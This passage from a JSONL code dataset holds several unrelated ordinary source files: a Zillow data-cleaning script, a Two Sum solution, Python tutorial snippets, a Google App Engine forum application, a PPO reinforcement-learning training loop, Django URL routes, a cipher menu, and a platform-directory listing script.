incrementNode(fn, i):\r\n incrementRoot(fn)\r\n pos = SEEK_NUM + i\r\n n = str(int(read_file(fn, pos, NUM_SIZE)) + 1)\r\n write_file(fn, n, pos)\r\n\r\n# ~~~~~~~~~~~ #\r\n# hmm\r\n# ~~~~~~~~~~~ #\r\ndef noProblem(fn, tree):\r\n children = str(int(read_file(fn, SEEK_PID, NUM_SIZE)))\r\n if tree.id != children:\r\n while len(children) < NUM_SIZE: children += ' '\r\n tree.set_id(children)\r\n if tree.id == tree.parent:\r\n parent = \"0\"\r\n while len(parent) < NUM_SIZE: parent += ' '\r\n tree.set_parent(parent)\r\n if tree.name == fn[:-3] or \\\r\n int(tree.id) == NUM_MAX or \\\r\n int(tree.num) == NUM_MAX:\r\n return False\r\n return True\r\n","sub_path":"creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178879091","text":"# imports needed\nimport pandas as pd\nimport numpy as np\nimport os\nfrom env import host, user, password\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\n\ndef get_connection(db, user=user, host=host, password=password):\n '''\n This function uses my info from my env file to\n create a connection url to access the Codeup db.\n '''\n return f'mysql+pymysql://{user}:{password}@{host}/{db}'\n \n\ndef get_zillow_data():\n '''\n This function uses the SQL query from below and specifies the database to use\n '''\n # SQL query that joins all of the tables together from the 'zillow' database\n # Tweaked to include Ravinder's insights\n sql_query = \"\"\"\n SELECT prop.*, \n pred.logerror, \n pred.transactiondate, \n air.airconditioningdesc, \n arch.architecturalstyledesc, \n build.buildingclassdesc, \n 
heat.heatingorsystemdesc, \n landuse.propertylandusedesc, \n story.storydesc, \n construct.typeconstructiondesc \n\t\t\t\tFROM properties_2017 prop \n INNER JOIN (SELECT parcelid,\n \t\t\t\t\t logerror,\n Max(transactiondate) transactiondate \n FROM predictions_2017 \n GROUP BY parcelid, logerror) pred\n USING (parcelid) \n LEFT JOIN airconditioningtype air USING (airconditioningtypeid) \n LEFT JOIN architecturalstyletype arch USING (architecturalstyletypeid) \n LEFT JOIN buildingclasstype build USING (buildingclasstypeid) \n LEFT JOIN heatingorsystemtype heat USING (heatingorsystemtypeid) \n LEFT JOIN propertylandusetype landuse USING (propertylandusetypeid) \n LEFT JOIN storytype story USING (storytypeid) \n LEFT JOIN typeconstructiontype construct USING (typeconstructiontypeid) \n WHERE prop.latitude IS NOT NULL \n AND prop.longitude IS NOT NULL;\n \"\"\"\n return pd.read_sql(sql_query,get_connection('zillow'))\n\n\ndef wrangle():\n df = pd.read_csv('zillow.csv')\n \n # Restrict df to only properties that meet single-use criteria\n single_use = [261, 262, 263, 264, 266, 268, 273, 276, 279]\n df = df[df.propertylandusetypeid.isin(single_use)]\n \n # Filter those properties without at least 1 bath & bed and 500 sqft area\n df = df[(df.bedroomcnt > 0) & (df.bathroomcnt > 0) & ((df.unitcnt<=1)|df.unitcnt.isnull())\\\n & (df.calculatedfinishedsquarefeet>500)]\n\n # Drop columns and rows based on a predetermined criteria\n df = handle_missing_values(df)\n \n # Add column for counties\n df['county'] = np.where(df.fips == 6037, 'Los_Angeles',\n np.where(df.fips == 6059, 'Orange', \n 'Ventura'))\n \n # Drop unnecessary/redundant columns\n df = df.drop(['id',\n 'calculatedbathnbr', 'finishedsquarefeet12', 'fullbathcnt', 'heatingorsystemtypeid'\n ,'propertycountylandusecode', 'propertylandusetypeid','propertyzoningdesc', \n 'censustractandblock', 'propertylandusedesc', 'heatingorsystemdesc'],axis=1)\n \n # Replace nulls in unitcnt with 1\n df.unitcnt.fillna(1, inplace = True)\n \n # Replace nulls with median values for select columns\n df.lotsizesquarefeet.fillna(7315, inplace = True)\n df.buildingqualitytypeid.fillna(6.0, inplace = True)\n \n # Drop any remaining nulls\n df = df.dropna()\n \n # Columns that need to be adjusted for outliers\n df = df[df.taxvaluedollarcnt < 4_500_000]\n df[df.calculatedfinishedsquarefeet < 8000]\n \n return df\n\ndef handle_missing_values(df, prop_required_column = .5, prop_required_row = .70):\n\t#Function will drop rows or columns based on the percent of values that are missing\n\t#handle_missing_values(df, prop_required_column, prop_required_row\n threshold = int(round(prop_required_column*len(df.index),0))\n df.dropna(axis=1, thresh=threshold, inplace=True)\n threshold = int(round(prop_required_row*len(df.columns),0))\n df.dropna(axis=0, thresh=threshold, inplace=True)\n return df\n\ndef outlier_function(df, cols, k):\n\t#function to detect and handle oulier using IQR\n for col in df[cols]:\n q1 = df.annual_income.quantile(0.25)\n q3 = df.annual_income.quantile(0.75)\n iqr = q3 - q1\n upper_bound = q3 + k * iqr\n lower_bound = q1 - k * iqr \n df = df[(df[col] < upper_bound) & (df[col] > lower_bound)]\n return df","sub_path":"wrangle_zillow.py","file_name":"wrangle_zillow.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"112432426","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n seen = {}\n ans = []\n for i in 
range(len(nums)):\n            if (target - nums[i]) in seen.keys():\n                ans.append(i)\n                ans.append(seen[target-nums[i]])\n            else:\n                seen[nums[i]] = i\n\n        return ans\n","sub_path":"1 - Two Sum/python/one-pass-hash/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"15967219","text":"names = [\"jiawei\", \"mingxin\", \"zeyu\"]\r\nnames2 = names\r\nstudent = {\"name\" : \"Jiawei\"} #dict\r\na = \"my favorite\"\r\nb = 2\r\ndef test1():\r\n    print(\"The original ver: %s\"%names)\r\n    names[2] = \"jian\"\r\n    student[\"age\"] = \"12\"\r\n    print(names)\r\n    print(student)\r\n    global a\r\n    a = \"Cristiano\"\r\n    global b\r\n    b = b + 1\r\ntest1()\r\nprint(a)\r\nprint(b)\r\n\r\na = [1,2]\r\nprint(id(a))\r\na.insert(1,5) # insert 5 at index 1\r\nprint(a)\r\nprint(id(a))\r\na = [4,5]\r\nprint(id(a))\r\n#######################################\r\n# returning multiple results\r\n# a tuple works, and so does a list\r\ndef test1():\r\n    a = 1\r\n    b = 2\r\n    return [a,b]\r\nx = test1()\r\nprint(x)\r\n\r\ndef test2(x,y,z = 10, d = 1):\r\n    return x + y + z\r\nx = test2(1,1)\r\nprint(x)\r\n###################\r\nprint(\"-------------\")\r\ndef test1(x,y,*args, z = 20):\r\n    print(args)\r\n    sum = 0\r\n    for i in args:\r\n        sum = sum + i\r\n    print(sum)\r\ntest1(1,2,3,4,4,5,6,z = 10)\r\n\r\ndef test2(x, y, *args, **kwargs):\r\n    print(x)\r\n    print(args)\r\n    print(kwargs)\r\n    sum = 0\r\n    for i in kwargs.values():\r\n        sum = sum + i\r\n    print(sum)\r\ntest2(2,3,4,5,6,7,8, num1 = 1, num2 = 2)\r\n\r\nnums = [3,4]\r\nnum1 = {\"num1\" : 5, \"num2\" : 6}\r\ndef test3(x, y, *args, **kwargs):\r\n    sum = 0\r\n    print(x)\r\n    print(args)\r\n    print(kwargs)\r\ntest3(1,2,3,*nums, **num1 )","sub_path":"9.5Fuction2.py","file_name":"9.5Fuction2.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"215582895","text":"# This code is in Public Domain. Take all the code you want, we'll just write more.\n\nimport StringIO, re, string, sha, time, random, cgi, urllib, datetime, pickle, logging\nimport wsgiref.handlers\n\nfrom google.appengine.api import users\nfrom google.appengine.api import memcache\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp import template\n\nfrom django.utils import feedgenerator\nfrom django.template import Context, Template\n\nfrom model import FofouSettings, FofouUser, Forum, Topic, Post\n\nDEBUG = False\n\nHTTP_NOT_ACCEPTABLE = 406\nHTTP_NOT_FOUND = 404\nHTTP_DATE_FMT = \"%a, %d %b %Y %H:%M:%S GMT\"\n\n# Cookie code based on http://code.google.com/p/appengine-utitlies/source/browse/trunk/utilities/session.py\nFOFOU_COOKIE = \"fofou-uid\"\n\n# Valid for 120 days\nCOOKIE_EXPIRE_TIME = 120\n\nSKINS = [\"default\"]\nBANNED_IPS = { }\nRE_VALID_URL = re.compile(r'^[a-z0-9]+([_\\-]?[a-z0-9]+)*$')\n\ndef to_unicode(val):\n    if isinstance(val, unicode): \n        return val\n    try: return unicode(val, 'latin-1')\n    except: pass\n    try: return unicode(val, 'ascii')\n    except: pass\n    try: return unicode(val, 'utf-8')\n    except: raise\n\ndef to_utf8(s):\n    return to_unicode(s).encode(\"utf-8\")\n\nclass FofouBase(webapp.RequestHandler):\n    \"\"\" A base class for all request handlers. Abstracts cookies and response writes. 
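    Example (editor's sketch; the subclass name and template path below are
    hypothetical, shown only to illustrate this base class's contract):

        class HelloHandler(FofouBase):
            def get(self):
                uid = self.cookie   # lazily issues the fofou-uid cookie
                self.template_out("skins/default/hello.html", {"uid": uid})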
\"\"\"\n \n def __init__(self, *args, **kwargs):\n super(FofouBase, self).__init__(*args, **kwargs)\n self.settings = FofouSettings.load()\n \n def template_out(self, template_path, template_values):\n # just a dummy call to to the function\n self.get_cooke()\n self.response.headers['Content-Type'] = 'text/html'\n self.response.out.write( template.render(template_path, template_values) )\n\n def get_cooke(self):\n if self._cookie:\n return self._cookie\n\n try:\n fid = self.request.cookies[FOFOU_COOKIE]\n except KeyError:\n fid = sha.new(repr(time.time())).hexdigest()\n expires = datetime.datetime.now() + datetime.timedelta(COOKIE_EXPIRE_TIME)\n self.response.headers['Set-Cookie'] = '%s=%s; expires=%s; path=/' % (FOFOU_COOKIE, fid, expires.strftime(HTTP_DATE_FMT))\n\n self._cookie = fid\n return self._cookie\n\n cookie = property(get_cooke)\n _cookie = None \n\nclass ManageSettings(FofouBase):\n \n def get(self):\n user = users.get_current_user()\n is_admin = users.is_current_user_admin()\n \n if not is_admin:\n return self.redirect(\"/\")\n \n tvals = {\n 'isadmin': is_admin,\n 'user': user,\n 'settings': self.settings,\n 'logout_url': users.create_logout_url(\"/\")\n }\n return self.template_out(\"skins/default/settings.html\", tvals)\n \n def post(self):\n user = users.get_current_user()\n is_admin = users.is_current_user_admin()\n \n if not is_admin:\n return self.redirect(\"/\")\n \n banned = self.request.get('banned_ips', '').strip()\n email_white = self.request.get('email_whitelist', '').strip()\n email_black = self.request.get('email_blacklist', '').strip()\n\n if self.request.remote_addr in banned:\n banned = banned.replace(self.request.remote_addr, \"\")\n \n self.settings.email_blacklist = email_black\n self.settings.email_whitelist = email_white\n self.settings.banned_ips = banned\n \n self.settings.put()\n \n return self.redirect(self.request.url)\n\nclass ManageForums(FofouBase):\n\n def init(self):\n \"\"\" Initializes the ManageForums views \"\"\"\n \n self.tpl = \"skins/default/forum_list.html\"\n self.forums = db.GqlQuery(\"SELECT * FROM Forum\") \n self.admin = users.is_current_user_admin()\n self.user = users.get_current_user()\n self.forum = None\n self.redir = False\n self.tvals = {\n 'logout_url': users.create_logout_url(\"/\"),\n 'hosturl': self.request.host_url,\n 'isadmin': self.admin,\n 'forums': self.forums,\n 'user': self.user\n }\n forum_key = self.request.get('forum_key')\n if forum_key:\n self.forum = db.get( db.Key( forum_key ) )\n if not self.forum:\n self.redir = True\n\n def get(self):\n \"\"\" Responds to GET requests to the /manageforums URL \"\"\"\n self.init()\n\n if self.redir or not self.admin:\n return self.redirect(\"/\")\n \n # We are disabling/enabling or editing a forum\n forum = self.forum\n if forum:\n forum.tagline = forum.tagline or \"Tagline\"\n forum.title_non_empty = forum.title or \"Title\"\n forum.sidebar_non_empty = forum.sidebar or \"Sidebar\"\n\n if self.request.get('disable') or self.request.get('enable'):\n if self.request.get('disable'):\n forum.is_disabled = True\n elif self.request.get('enable'):\n forum.is_disabled = False\n forum.put()\n return self.redirect(\"/manageforums\")\n \n self.tvals['forum'] = forum\n return self.template_out(self.tpl, self.tvals)\n\n def post(self):\n \"\"\" Responds to POST requests to the /manageforums URL \"\"\"\n self.init()\n \n if self.redir or not self.admin:\n return self.redirect(\"/\")\n \n if not RE_VALID_URL.match( self.request.get('url') ) or \\\n not self.forum and Forum.gql(\"WHERE 
url = :1\", self.request.get('url') ).get():\n self.tvals.update({\n 'errmsg': \"Url contains illegal characters or is already used by another forum\",\n 'hosturl': self.request.host_url,\n 'forum': { \n 'url': self.request.get('url'), \n 'title': self.request.get('title'), \n 'tagline': self.request.get('tagline'), \n 'sidebar': self.request.get('sidebar'), \n 'analytics_code': self.request.get('analytics_code')\n }\n })\n return self.template_out(self.tpl, self.tvals)\n \n if self.forum:\n forum = self.forum\n forum.url = self.request.get('url')\n forum.title = self.request.get('title')\n forum.tagline = self.request.get('tagline')\n forum.sidebar = self.request.get('sidebar')\n forum.analytics_code = self.request.get('analytics_code')\n else:\n forum = Forum(\n url=self.request.get('url'), \n title=self.request.get('title'), \n tagline=self.request.get('tagline'), \n sidebar=self.request.get('sidebar'), \n analytics_code=self.request.get('analytics_code')\n )\n \n forum.put()\n return self.redirect(\"/manageforums\")\n\nclass DeleteTopic(webapp.RequestHandler):\n\n def get(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n\n # Only admins can delete or undelete posts\n if not forum or not is_admin:\n return self.redirect(\"/\")\n \n try:\n post = db.get( db.Key.from_path( 'Post', int( self.request.get('id') ) ) )\n except ValueError:\n return self.redirect(forum.root())\n\n topic = post.topic\n first = Post.gql(\"WHERE topic=:1 ORDER BY created_on\", topic).get()\n\n if not post or topic.forum.key() != forum.key():\n return self.redirect(forum.root())\n\n if post.is_deleted:\n post.is_deleted = False\n if first.key() == post.key():\n topic.is_deleted = False\n forum.num_topics += 1\n forum.num_posts += topic.ncomments\n else:\n topic.ncomments += 1\n if not topic.is_deleted:\n forum.num_posts += 1\n else:\n post.is_deleted = True\n if first.key() == post.key():\n topic.is_deleted = True\n forum.num_topics -= 1\n forum.num_posts -= topic.ncomments\n else:\n topic.ncomments -= 1\n forum.num_posts -= 1\n \n post.put()\n topic.put()\n forum.put()\n return self.redirect( \"%stopic?id=%s\" % (forum.root(), topic.id) )\n\nclass LockTopic(webapp.RequestHandler):\n\n def get(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n\n # Only admins can delete or undelete posts\n if not forum or not is_admin:\n return self.redirect(\"/\")\n\n try:\n topic = db.get( db.Key.from_path( 'Topic', int(self.request.get('id')) ) )\n except ValueError:\n return self.redirect( forum.root() )\n\n if topic:\n topic.is_locked = not topic.is_locked\n topic.put()\n\n return self.redirect( forum.root() )\n\nclass ForumList(FofouBase):\n def get(self):\n user = users.get_current_user()\n is_admin = users.is_current_user_admin()\n \n if is_admin:\n return self.redirect(\"/manageforums\")\n \n if not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n \n if not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n \n tvals = {\n 'forums': db.GqlQuery(\"SELECT * FROM Forum\"),\n 'isadmin': is_admin,\n 'login_url': users.create_login_url(\"/\"),\n 'logout_url': users.create_logout_url(\"/\"),\n 'user': user\n }\n\n self.template_out(\"skins/default/forum_list.html\", tvals)\n\nclass TopicList(FofouBase):\n \"\"\" Shows a list of topics, potentially starting from topic with an offset \"\"\"\n\n def get(self):\n forum = 
Forum.from_url(self.request.path_info)\n user = users.get_current_user()\n is_admin = users.is_current_user_admin()\n \n if not forum or (forum.is_disabled and not is_admin):\n return self.redirect(\"/\")\n \n if not is_admin and not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n\n if not is_admin and not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n\n offset, topics = Topic.getlist(forum, is_admin=is_admin, offset=self.request.get(\"from\") or None)\n for topic in topics:\n topic.excerpt = Post.gql(\"WHERE topic = :1 ORDER BY created_on\", topic)[0].get_excerpt()\n\n tvals = {\n 'user': user,\n 'analytics_code': forum.analytics_code or \"\",\n 'siteurl': self.request.url,\n 'isadmin': is_admin,\n 'forum' : forum,\n 'forum_urls': [f.url for f in Forum.all()],\n 'topics': topics,\n 'offset': offset,\n 'login_url': users.create_login_url(forum.root()),\n 'logout_url': users.create_logout_url(forum.root())\n }\n\n self.template_out(\"skins/default/topic_list.html\", tvals)\n\n# A thread of comments on a topic\nclass Thread(FofouBase):\n\n def get(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n user = users.get_current_user()\n \n if not forum or (forum.is_disabled and not is_admin):\n return self.redirect(\"/\")\n \n if not is_admin and not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n\n if not is_admin and not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n \n try: \n topic_id = int( self.request.get('id') or 0 )\n except ValueError:\n topic_id = 0\n\n if not topic_id:\n return self.redirect(forum.root())\n\n topic = db.get( db.Key.from_path('Topic', topic_id) )\n \n if not topic or (topic.is_deleted and not is_admin):\n return self.redirect(forum.root())\n \n # TODO: Make Pagination\n if is_admin:\n posts = Post.gql(\"WHERE topic = :1 ORDER BY created_on\", topic)\n else:\n posts = Post.gql(\"WHERE topic = :1 AND is_deleted = False ORDER BY created_on\", topic)\n \n tvals = {\n 'user': user,\n 'analytics_code' : forum.analytics_code or \"\",\n 'isadmin': is_admin,\n 'forum': forum,\n 'topic': topic,\n 'posts': posts,\n 'login_url' : users.create_login_url(self.request.url),\n 'logout_url' : users.create_logout_url(self.request.url)\n }\n self.template_out(\"skins/default/topic.html\", tvals)\n\n# responds to //move?id=\nclass MoveTopic(webapp.RequestHandler):\n\n def post(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n\n # Only admins can move topics\n if not forum or not is_admin:\n return self.redirect(\"/\")\n\n try:\n forumto = Forum.from_url(self.request.get('forumto'))\n topic = db.get( db.Key.from_path( 'Topic', int(self.request.get('id')) ) )\n except ValueError:\n return self.redirect(forum.root())\n\n if topic and forumto:\n topic.forum = forumto\n topic.put()\n forum.num_topics -= 1\n forum.num_posts -= topic.ncomments\n forum.put()\n forumto.num_topics += 1\n forumto.num_posts += topic.ncomments\n forumto.put()\n\n return self.redirect(forum.root())\n\n# Responds to //post[?id=]\nclass PostForm(FofouBase):\n def get(self):\n is_admin = users.is_current_user_admin()\n forum = Forum.from_url(self.request.path_info)\n user = users.get_current_user()\n \n if not forum or (forum.is_disabled and not is_admin):\n return self.redirect(\"/\")\n \n if 
not is_admin and not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n\n if not is_admin and not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n \n # Get user either by google user id or cookie\n if user:\n fuser = FofouUser.gql(\"WHERE user = :1\", user).get()\n else: \n fuser = FofouUser.gql(\"WHERE cookie = :1\", self.cookie ).get()\n\n tvals = {\n 'user': user,\n 'isadmin': is_admin,\n 'forum': forum,\n 'fuser': fuser or {\n 'email': user.email() if user else \"\",\n 'name': user.nickname() if user else \"\",\n 'remember_me': True\n },\n 'post': { 'subject': '' },\n 'login_url' : users.create_login_url(self.request.url),\n 'logout_url' : users.create_logout_url(self.request.url)\n }\n \n topic_id = self.request.get('id')\n if topic_id:\n tvals['topic'] = db.get(db.Key.from_path('Topic', int(topic_id)))\n if not tvals['topic']:\n return self.redirect( forum.root() )\n\n self.template_out(\"skins/default/post.html\", tvals)\n\n def post(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n user = users.get_current_user()\n \n if not forum or (forum.is_disabled and not is_admin):\n return self.redirect(\"/\")\n\n if not is_admin and not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n\n if not is_admin and not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n\n name = self.request.get('name').strip()\n email = self.request.get('email').strip()\n subject = self.request.get('subject').strip()\n message = to_unicode( self.request.get('message') ).strip()\n homepage = self.request.get('homepage').strip()\n homepage = \"\" if homepage == \"http://\" else homepage\n remember = bool(self.request.get('remember'))\n \n try: \n topic_id = int( self.request.get('topic_id') or 0 )\n if topic_id:\n topic = db.get(db.Key.from_path('Topic', topic_id))\n else:\n topic = None\n except ValueError:\n topic = None\n \n if topic and topic.is_locked:\n return self.redirect( \"%stopic?id=%s\" % (forum.root(), topic.id) )\n \n # Perform simple validation\n errors = { 'valid': True }\n \n # First post must have a subject\n if not topic and not subject: \n errors['valid'] = False\n errors['subject'] = \"Subject required for new topic\"\n \n if not message:\n errors['valid'] = False\n errors['message'] = \"Message is required\"\n \n # sha.new() doesn't accept Unicode strings, so convert to utf8 first\n sha1_digest = sha.new( message.encode('UTF-8') ).hexdigest()\n if Post.gql(\"WHERE sha1_digest = :1 AND topic = :2\", sha1_digest, topic).get():\n errors['valid'] = False\n errors['message'] = \"This is a duplicate post\"\n\n if not errors['valid']:\n return self.template_out(\"skins/default/post.html\", {\n 'isadmin': is_admin,\n 'user': user,\n 'errors': errors,\n 'forum': forum,\n 'topic': topic and { 'id': topic_id, 'subject': topic.subject },\n 'post': { 'message': message, 'subject': subject },\n 'fuser': { 'name': name, 'email': email, 'homepage': homepage, 'remember_me': remember }\n })\n\n # Get user either by google user id or cookie. 
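# --- Editor's note -----------------------------------------------------------
# The `sha` module used for sha1_digest above is the long-removed Python 2
# API. The Python 3 equivalent, for reference, is hashlib:
#
#     import hashlib
#     sha1_digest = hashlib.sha1(message.encode('utf-8')).hexdigest()
#
# The digest only serves as a duplicate-post key here, so SHA-1 is fine.
# -----------------------------------------------------------------------------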
Create user objects if don't already exist \n\n if user:\n fuser = FofouUser.gql(\"WHERE user = :1\", user).get()\n else: \n fuser = FofouUser.gql(\"WHERE cookie = :1\", self.cookie).get()\n\n if not fuser:\n fuser = FofouUser(\n user = user or users.User('anonymous@example.com'),\n remember_me = remember, \n email = email or 'anonymous@example.com', \n name = name or 'Anonymous', \n homepage = homepage,\n cookie = self.cookie )\n else:\n fuser.remember_me = remember\n fuser.email = email or 'anonymous@example.com'\n fuser.name = name or 'Anonymous'\n fuser.homepage = homepage\n\n if not topic:\n topic = Topic(forum=forum, subject=subject, created_by=fuser.name)\n forum.num_topics += 1\n else:\n topic.ncomments += 1\n forum.num_posts += 1\n \n topic.put()\n fuser.put()\n \n post = Post(\n topic = topic, \n user = fuser, \n user_ip = self.request.remote_addr, \n message = message, \n sha1_digest = sha1_digest, \n user_name = fuser.name,\n user_email = fuser.email,\n user_homepage = homepage\n )\n \n post.put()\n forum.put()\n\n self.redirect( \"%stopic?id=%s\" % (forum.root(), topic.id) )\n\nif __name__ == \"__main__\":\n wsgiref.handlers.CGIHandler().run( webapp.WSGIApplication( routes, [\n ('/', ForumList),\n ('/manageforums', ManageForums),\n ('/managesettings', ManageSettings),\n ('/[^/]+/delete', DeleteTopic),\n ('/[^/]+/lock', LockTopic),\n ('/[^/]+/post', PostForm),\n ('/[^/]+/move', MoveTopic),\n ('/[^/]+/topic', TopicForm),\n ('/[^/]+/?', TopicList)], debug=DEBUG))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"424941973","text":"import numpy as np\nimport torch\nimport gym\nfrom ppo.PPO import PPO, Memory\nfrom ppo.utils import ReplayBuffer\nfrom env_exp import SocTwoEnv\n\nenv_path = './env/macos/SoccerTwosFast.app'\nenv = SocTwoEnv(env_path, worker_id=0, train_mode=True)\n\n############## Hyperparameters Striker ##############\nstate_dim_striker = 112\naction_dim_striker = 7\nn_latent_var_striker = 64 # number of variables in hidden layer\n#############################################\n\n############## Hyperparameters Goalie ##############\nstate_dim_goalie = 112\naction_dim_goalie = 5\nn_latent_var_goalie = 64 # number of variables in hidden layer\n#############################################\n\n\nmax_episodes = 50000 # max training episodes\nmax_timesteps = 300 # max timesteps in one episode\nsolved_reward = 230 # stop training if avg_reward > solved_reward\nlog_interval = 100 # print avg reward in the interval\nupdate_timestep = 200 # update policy every n timesteps 2000\nlr = 0.001\ngamma = 0.99 # discount factor\nK_epochs = 4 # update policy for K epochs\neps_clip = 0.2 # clip parameter for PPO\nrandom_seed = None\n\nif random_seed:\n torch.manual_seed(random_seed)\n env.seed(random_seed)\n\nmemory_striker = Memory()\nppo_striker = PPO(state_dim_striker, action_dim_striker, n_latent_var_striker,\n lr, gamma, K_epochs, eps_clip)\n\nmemory_goalie = Memory()\nppo_goalie = PPO(state_dim_goalie, action_dim_goalie, n_latent_var_goalie, lr,\n gamma, K_epochs, eps_clip)\n\n# logging variables\nrunning_reward = 0\navg_length = 0\ntimestep = 0\n\n# training loop\nstate_striker, state_goalie = env.reset()\nfor i_episode in range(1, max_episodes + 1):\n for t in range(max_timesteps):\n timestep += 1\n\n # Running policy_old:\n action_striker = ppo_striker.policy_old.act(state_striker, memory_striker)\n action_goalie = 
ppo_goalie.policy_old.act(state_goalie, memory_goalie)\n states, reward, done, _ = env.step(action_striker, action_goalie)\n print(np.argwhere(done))\n # Saving reward:\n memory_striker.update_reward(reward[0])\n memory_goalie.update_reward(reward[1])\n\n # update if its time\n if timestep % update_timestep == 0:\n ppo_striker.update(memory_striker)\n memory_striker.clear_memory()\n\n ppo_goalie.update(memory_goalie)\n memory_goalie.clear_memory()\n\n timestep = 0\n\n running_reward += max(reward[0])\n\n\n avg_length += t\n\n # stop training if avg_reward > solved_reward\n if running_reward > (log_interval * solved_reward):\n print(\"########## Solved! ##########\")\n torch.save(ppo_striker.policy.state_dict(),\n './PPO_{}.pth'.format('SoccerTwos'))\n break\n\n # logging\n if i_episode % log_interval == 0:\n avg_length = int(avg_length / log_interval)\n running_reward = int((running_reward / log_interval))\n\n print('Episode {} \\t avg length: {} \\t reward: {}'.format(\n i_episode, avg_length, running_reward))\n running_reward = 0\n avg_length = 0","sub_path":"main_ppo.py","file_name":"main_ppo.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"40506451","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index),\n path('home', views.index, name='home'),\n path('overview', views.overview, name='overview'),\n path('skills', views.skills, name='skills'),\n path('about', views.about, name='about'),\n]","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"465450716","text":"from Ceasarscipher import caesar_cipher\nfrom AbtashCipher import atbash\nfrom ColumnarTranspositionCipher import transpositionCipher\nfrom PlayfairCipher import playfair_cipher\n\nch=1\nwhile ch!=0:\n print(\"(1) Ceasar's Cipher\") #Do not forget to add the encryption method option\n print(\"(2) Atbash Cipher\") # in the menu\n print(\"(3) ColumnarTranspositionCipher\")\n print(\"(4) Playfair Cipher\")\n print(\"(5) Reverse Cipher\")\n print(\"(0) Exit Menu\")\n ch = int(input(\"Enter Encryption choice (1/2/3/4/5/0): \")) #Also update the choices here\n if ch==1:\n s=input(\"Enter String: \")\n k=int(input(\"Enter the shift value: \"))\n s=caesar_cipher(s, k)\n print(s)\n \n elif ch==2:\n string=input(\"Enter String: \")\n string=atbash(string)\n print(string)\n\n elif ch==3:\n message = input(\"Enter Message: \")\n key = int(input(\"Enter key: \"))\n message = transpositionCipher(key,message) \n print(message) \n \n elif ch == 4:\n string = input(\"Enter string:\")\n key = input(\"Enter the key (a string):\")\n print(playfair_cipher(string,key))\n \n elif ch==5:\n message = input(\"Enter your message: \")\n print(Reverse_cipher(message))\n \n","sub_path":"EncryptMethods.py","file_name":"EncryptMethods.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455668791","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2021 Huawei Device Co., Ltd.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in 
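# --- Editor's note (sketch; not part of the original record) -----------------
# The EncryptMethods menu above calls Reverse_cipher(message) for choice 5
# but never imports or defines it, so that branch raises NameError as
# written. A minimal definition matching the call site (the name is taken
# from the call; the body is an assumption about the intended cipher):

def Reverse_cipher(message):
    # a slice with step -1 walks the string back to front
    return message[::-1]
# -----------------------------------------------------------------------------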
writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\n\n\ndef main():\n if (len(sys.argv) != 2):\n sys.stderr.write(\"MUST have 1 parameter for the searching path\")\n sys.stderr.write(os.linesep)\n exit(os.errno.EINVAL)\n\n base_dir = os.path.realpath(sys.argv[1])\n if (not os.path.isdir(base_dir)):\n sys.stderr.write(\"Searching path MUST be a directory\")\n sys.stderr.write(os.linesep)\n exit(os.errno.EINVAL)\n\n for item in os.listdir(base_dir):\n if not os.path.isdir(os.path.join(base_dir, item)):\n continue\n\n file_path = os.path.join(base_dir, item, \"build\", \"platform.gni\")\n if not os.path.isfile(file_path):\n continue\n\n sys.stdout.write(item)\n sys.stdout.write(os.linesep)\n\nif __name__ == \"__main__\":\n 